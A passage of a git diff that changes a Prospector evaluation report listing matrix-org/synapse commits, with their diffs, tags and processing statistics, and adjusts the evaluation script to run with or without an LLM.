"v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "a7a913918cf04c6d900223b19e719fafbbe94efa", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608285116, - "hunks": 2, - "message": "Merge remote-tracking branch 'origin/erikj/as_mau_block' into develop", - "diff": [ - "diff --cc tests/test_mau.py", - "index 02e56e1b0,586294446..51660b51d", - "--- a/tests/test_mau.py", - "+++ b/tests/test_mau.py", - "@@@ -203,3 -243,5 +243,5 @@@ class TestMauLimit(unittest.HomeserverT", - "- channel = self.make_request(\"POST\", \"/register\", request_data)", - " - request, channel = self.make_request(", - " - \"POST\", \"/register\", request_data, access_token=token", - "++ channel = self.make_request(", - "++ \"POST\", \"/register\", request_data, access_token=token,", - "+ )" - ], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "0378581c1335e7e7e9dc0b482b5bf6efb63859be", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608071660, - "hunks": 8, - "message": "remove 'response' result from `_get_shared_rooms`", - "diff": [ - "diff --git a/tests/rest/client/v2_alpha/test_shared_rooms.py b/tests/rest/client/v2_alpha/test_shared_rooms.py", - "index 562a9c1ba..05c5ee5a7 100644", - "--- a/tests/rest/client/v2_alpha/test_shared_rooms.py", - "+++ b/tests/rest/client/v2_alpha/test_shared_rooms.py", - "@@ -19,2 +19,3 @@ from synapse.rest.client.v2_alpha import shared_rooms", - " from tests import unittest", - "+from tests.server import FakeChannel", - "@@ -42,4 +43,4 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - "- def _get_shared_rooms(self, token, other_user):", - "- request, channel = self.make_request(", - "+ def _get_shared_rooms(self, token, other_user) -> FakeChannel:", - "+ _, channel = self.make_request(", - " \"GET\",", - "@@ -49,3 +50,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - " )", - "- return request, channel", - "+ return channel", - "@@ -65,3 +66,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - "- request, channel = self._get_shared_rooms(u1_token, u2)", - "+ channel = self._get_shared_rooms(u1_token, u2)", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -84,3 +85,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - "- request, channel = self._get_shared_rooms(u1_token, u2)", - "+ channel = self._get_shared_rooms(u1_token, u2)", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -106,3 +107,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - "- request, channel = self._get_shared_rooms(u1_token, u2)", - "+ channel = self._get_shared_rooms(u1_token, u2)", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -127,3 +128,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - " # Assert user directory is not empty", - "- request, channel = self._get_shared_rooms(u1_token, u2)", - "+ channel = self._get_shared_rooms(u1_token, u2)", - " self.assertEquals(200, channel.code, channel.result)", - "@@ -134,3 +135,3 @@ class UserSharedRoomsTest(unittest.HomeserverTestCase):", - "- request, channel = self._get_shared_rooms(u2_token, u1)", - "+ channel = self._get_shared_rooms(u2_token, u1)", - " self.assertEquals(200, channel.code, channel.result)" - ], - "changed_files": [ - "tests/rest/client/v2_alpha/test_shared_rooms.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - }, - { - "commit_id": "2d7ca53ab54dd03dce0d64cf41b0b74de16f3215", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607530307, - "hunks": 0, - "message": "Merge branch 'rav/fix_multiarch_builds' into v1.23.1-multiarch", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [] - }, - { - "commit_id": "863359a04fe36cfa63aa92392acb7510d76f854d", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608049573, - "hunks": 0, - "message": "Merge remote-tracking branch 'origin/develop' into matrix-org-hotfixes", - "diff": [], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.35.0rc3" - ], - "matched_rules": [] - }, - { - "commit_id": "33a349df91a459435e33c5676bb40c8690492f65", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608038594, - "hunks": 2, - "message": "Merge branch 'develop' into matrix-org-hotfixes", - "diff": [ - "diff --cc synapse/push/httppusher.py", - "index d011e0ace,5408aa129..995e86e31", - "--- a/synapse/push/httppusher.py", - "+++ b/synapse/push/httppusher.py", - "@@@ -101,8 -95,16 +95,21 @@@ class HttpPusher(Pusher)", - " raise PusherConfigException(\"'url' required in data for HTTP pusher\")", - "- self.url = self.data[\"url\"]", - "- self.url = self.url.replace(", - "+ ", - "+ url = self.data[\"url\"]", - "+ if not isinstance(url, str):", - "+ raise PusherConfigException(\"'url' must be a string\")", - "+ url_parts = urllib.parse.urlparse(url)", - "+ # Note that the specification also says the scheme must be HTTPS, but", - "+ # it isn't up to the homeserver to verify that.", - "+ if url_parts.path != \"/_matrix/push/v1/notify\":", - "+ raise PusherConfigException(", - "+ \"'url' must have a path of '/_matrix/push/v1/notify'\"", - "+ )", - "+ ", - "++ url = url.replace(", - " + \"https://matrix.org/_matrix/push/v1/notify\",", - " + \"http://10.103.0.7/_matrix/push/v1/notify\",", - " + )", - "- self.http_client = hs.get_proxied_http_client()", - "++", - "+ self.url = url", - "+ self.http_client = hs.get_proxied_blacklisted_http_client()", - " self.data_minus_url = {}" - ], - "changed_files": [], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.35.0rc3" - ], - "matched_rules": [] - }, - { - "commit_id": "4b08c387078aacefb7a06da2076eefc6673c4d55", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1607530079, - "hunks": 3, - "message": "Tweak CircleCI config to trigger rebuild of v1.24.0", - "diff": [ - "diff --git a/.circleci/config.yml b/.circleci/config.yml", - "index 088da5573..a0dad04d0 100644", - "--- a/.circleci/config.yml", - "+++ b/.circleci/config.yml", - "@@ -10,21 +10,5 @@ jobs:", - " - docker_build:", - "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", - "- platforms: linux/amd64", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:${CIRCLE_TAG}", - "+ tag: -t matrixdotorg/synapse:v1.24.0", - " platforms: linux/amd64,linux/arm/v7,linux/arm64", - "- dockerhubuploadlatest:", - "- docker:", - "- - image: docker:git", - "- steps:", - "- - checkout", - "- - docker_prepare", - "- - run: docker login --username $DOCKER_HUB_USERNAME --password $DOCKER_HUB_PASSWORD", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:latest", - "- platforms: linux/amd64", - "- - docker_build:", - "- tag: -t matrixdotorg/synapse:latest", - "- platforms: linux/amd64,linux/arm/v7,linux/arm64", - "@@ -33,12 +17,3 @@ workflows:", - " jobs:", - "- - dockerhubuploadrelease:", - "- filters:", - "- tags:", - "- only: /v[0-9].[0-9]+.[0-9]+.*/", - "- branches:", - "- ignore: /.*/", - "- - dockerhubuploadlatest:", - "- filters:", - "- branches:", - "- only: master", - "+ - dockerhubuploadrelease" - ], - "changed_files": [ - ".circleci/config.yml" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [], - "matched_rules": [] - }, - { - "commit_id": "7932d4e9f7e140ef05a3099e18120101019ec3e1", - "repository": "https://github.com/matrix-org/synapse", - "timestamp": 1608206654, - "hunks": 2, - "message": "Don't MAU limit AS ghost users", - "diff": [ - "diff --git a/synapse/api/auth_blocking.py b/synapse/api/auth_blocking.py", - "index 9c227218e..d8088f524 100644", - "--- a/synapse/api/auth_blocking.py", - "+++ b/synapse/api/auth_blocking.py", - "@@ -38,2 +38,3 @@ class AuthBlocking:", - " self._server_name = hs.hostname", - "+ self._track_appservice_user_ips = hs.config.appservice.track_appservice_user_ips", - "@@ -78,2 +79,8 @@ class AuthBlocking:", - " return", - "+ elif requester.app_service and not self._track_appservice_user_ips:", - "+ # If we're authenticated as an appservice then we only block", - "+ # auth if `track_appservice_user_ips` is set, as that option", - "+ # implicitly means that application services are part of MAU", - "+ # limits.", - "+ return" - ], - "changed_files": [ - "synapse/api/auth_blocking.py" - ], - "message_reference_content": [], - "jira_refs": {}, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "v1.25.0", - "v1.25.0rc1", - "v1.26.0", - "v1.26.0-deb", - "v1.26.0rc1", - "v1.26.0rc2", - "v1.27.0", - "v1.27.0rc1", - "v1.27.0rc2", - "v1.28.0", - "v1.28.0rc1", - "v1.29.0", - "v1.29.0rc1", - "v1.30.0", - "v1.30.0rc1", - "v1.30.1", - "v1.31.0", - "v1.31.0rc1", - "v1.32.0", - "v1.32.0rc1", - "v1.32.1", - "v1.32.2", - "v1.33.0", - "v1.33.0rc1", - "v1.33.0rc2", - "v1.33.1", - "v1.33.2", - "v1.34.0", - "v1.34.0rc1", - "v1.35.0", - "v1.35.0rc1", - "v1.35.0rc2", - "v1.35.0rc3", - "v1.35.1", - "v1.36.0", - "v1.36.0rc1", - "v1.36.0rc2", - "v1.37.0", - "v1.37.0rc1", - "v1.37.1", - "v1.37.1a1", - "v1.37.1rc1", - "v1.38.0", - "v1.38.0rc1", - "v1.38.0rc2", - "v1.38.0rc3", - "v1.38.1", - "v1.39.0", - "v1.39.0rc1", - "v1.39.0rc2", - "v1.39.0rc3", - "v1.40.0", - "v1.40.0rc1", - "v1.40.0rc2", - "v1.40.0rc3", - "v1.41.0", - "v1.41.0rc1", - "v1.41.1", - "v1.42.0", - "v1.42.0rc1", - "v1.42.0rc2", - "v1.43.0", - "v1.43.0rc1", - "v1.43.0rc2", - "v1.44.0", - "v1.44.0rc1", - "v1.44.0rc2", - "v1.44.0rc3", - "v1.45.0", - "v1.45.0rc1", - "v1.45.0rc2", - "v1.45.1", - "v1.46-modular1", - "v1.46.0", - "v1.46.0rc1", - "v1.47.0", - "v1.47.0rc1", - "v1.47.0rc2", - "v1.47.0rc3", - "v1.47.1", - "v1.48.0", - "v1.48.0rc1", - "v1.49.0", - "v1.49.0rc1", - "v1.49.1", - "v1.49.2", - "v1.50.0", - "v1.50.0rc1", - "v1.50.0rc2", - "v1.50.1", - "v1.50.2", - "v1.51.0", - "v1.51.0rc1", - "v1.51.0rc2", - "v1.52.0", - "v1.52.0rc1", - "v1.53.0", - "v1.53.0rc1", - "v1.54.0", - "v1.54.0rc1", - "v1.55.0", - "v1.55.0rc1", - "v1.55.1", - "v1.55.2", - "v1.56.0", - "v1.56.0rc1", - "v1.57.0", - "v1.57.0rc1", - "v1.57.1", - "v1.58.0", - "v1.58.0rc1", - "v1.58.0rc2", - "v1.58.1", - "v1.59.0", - "v1.59.0rc1", - "v1.59.0rc2", - "v1.59.1", - "v1.60.0", - "v1.60.0rc1", - "v1.60.0rc2", - "v1.61.0", - "v1.61.0rc1", - "v1.61.1", - "v1.62.0", - "v1.62.0rc1", - "v1.62.0rc2", - "v1.62.0rc3", - "v1.63.0", - "v1.63.0rc1", - "v1.63.1", - "v1.64.0", - "v1.64.0rc1", - "v1.64.0rc2", - "v1.65.0", - "v1.65.0.post1.dev1", - "v1.65.0rc1", - "v1.65.0rc2", - "v1.66.0", - "v1.66.0rc1", - "v1.66.0rc2", - "v1.67.0", - "v1.67.0rc1", - "v1.68.0", - "v1.68.0rc1", - "v1.68.0rc2", - "v1.69.0", - "v1.69.0rc1", - "v1.69.0rc2", - "v1.69.0rc3", - "v1.69.0rc4", - "v1.70.0", - "v1.70.0rc1", - "v1.70.0rc2", - "v1.70.1", - "v1.71.0", - "v1.71.0rc1", - "v1.71.0rc2", - "v1.72.0", - "v1.72.0rc1", - "v1.73.0", - "v1.73.0rc1", - "v1.73.0rc2", - "v1.74.0", - "v1.74.0rc1", - "v1.75.0", - "v1.75.0rc1", - "v1.75.0rc2", - "v1.76.0", - "v1.76.0rc1", - "v1.76.0rc2", - "v1.77.0", - "v1.77.0rc1", - "v1.77.0rc2", - "v1.78.0", - "v1.78.0rc1", - "v1.79.0", - "v1.79.0rc1", - "v1.79.0rc2", - "v1.80.0", - "v1.80.0rc1", - "v1.80.0rc2", - "v1.81.0", - "v1.81.0rc1", - "v1.81.0rc2", - "v1.82.0", - "v1.82.0rc1", - "v1.83.0", - "v1.83.0rc1", - "v1.84.0", - "v1.84.0rc1", - "v1.84.1", - "v1.85.0", - "v1.85.0rc1", - "v1.85.0rc2", - "v1.85.1", - "v1.85.2", - "v1.86.0", - "v1.86.0rc1", - "v1.86.0rc2", - "v1.87.0", - "v1.87.0rc1", - "v1.88.0", - "v1.88.0rc1", - "v1.89.0", - "v1.89.0rc1", - "v1.90.0", - "v1.90.0rc1", - "v1.91.0", - "v1.91.0rc1", - "v1.91.1", - "v1.91.2", - "v1.92.0", - "v1.92.0rc1", - "v1.92.1", - "v1.92.2", - "v1.92.3", - "v1.93.0", - "v1.93.0rc1", - "v1.94.0", - "v1.94.0rc1", - "v1.95.0", - "v1.95.0rc1", - "v1.95.1", - "v1.96.0", - "v1.96.0rc1", - "v1.96.1", - "v1.97.0", - "v1.97.0rc1", - "v1.98.0", - "v1.98.0rc1" - ], - "matched_rules": [] - } - ], - "processing_statistics": { - "LLM": { - "llm": { - "llm_service": { - "LLMService": { - "get_repository_url": { - "execution time": [ - 4.501857290044427 - ] - }, - "classify_commit": { - "execution time": [ - 1.8918308150023222, - 2.55834315251559, - 1.3472756873816252, - 1.5047113839536905, - 1.178794912993908, - 2.4042293401435018, - 2.262474901974201, - 1.3570511750876904, - 1.1510695340111852, - 1.2340552862733603 - ] - } - } - } - }, - "Get Repository URL": { - "# refs in request": [ - 244 - ] - } - }, - "core": { - "git": { - "git": { - "Git": { - "create_commits": { - "execution time": [ - 0.14438306167721748 - ] - } - } - } - }, - "commit preprocessing": { - "commit preprocessing": { - "preprocessed commits": [ - 91 - ] - }, - "execution time": [ - 93.05194529611617 - ] - }, - "save commits to backend": { - "execution time": [ - 0.02628356497734785 - ] - }, - "candidates analysis": { - "execution time": [ - 16.966724146157503 - ] - }, - "execution time": [ - 145.1848293952644 - ] - }, - "rules": { - "active": [ - 17 - ], - "matches": [ - 178 - ] - } - } -} diff --git a/prospector/evaluation/dispatch_jobs.py b/prospector/evaluation/dispatch_jobs.py index 4f416ba3e..076438f2e 100644 --- a/prospector/evaluation/dispatch_jobs.py +++ b/prospector/evaluation/dispatch_jobs.py @@ -22,7 +22,8 @@ evaluation_config = OmegaConf.load("evaluation/config.yaml") INPUT_DATA_PATH = evaluation_config.input_data_path -PROSPECTOR_REPORT_PATH = evaluation_config.prospector_reports_path +PROSPECTOR_REPORT_LLM_PATH = evaluation_config.prospector_reports_llm_path +PROSPECTOR_REPORT_NO_LLM_PATH = evaluation_config.prospector_reports_no_llm_path ANALYSIS_RESULTS_PATH = evaluation_config.analysis_results_path # get the redis server url @@ -291,15 +292,24 @@ def run_prospector_and_generate_report( # print(f"Enabled rules: {config.enabled_rules}") # sanity check + prospector_settings = evaluation_config.prospector_settings + # Rules are taken from config.yaml (the overall one), except run_with_llm is false in the evaluation config, then the llm rule is removed + enabled_rules = ( + config.enabled_rules + if prospector_settings.run_with_llm + else config.enabled_rules.remove("COMMIT_IS_SECURITY_RELEVANT") + ) + LLMService(config.llm_service) results, advisory_record = prospector( vulnerability_id=vuln_id, version_interval=v_int, backend_address=backend, - enabled_rules=config.enabled_rules, - use_llm_repository_url=True, + enabled_rules=enabled_rules, + use_llm_repository_url=prospector_settings.run_with_llm, ) + generate_report( results, advisory_record, @@ -307,29 +317,33 @@ def run_prospector_and_generate_report( output_file, ) - return results, advisory_record + # return results, advisory_record + return f"Ran Prospector on {vuln_id}" def 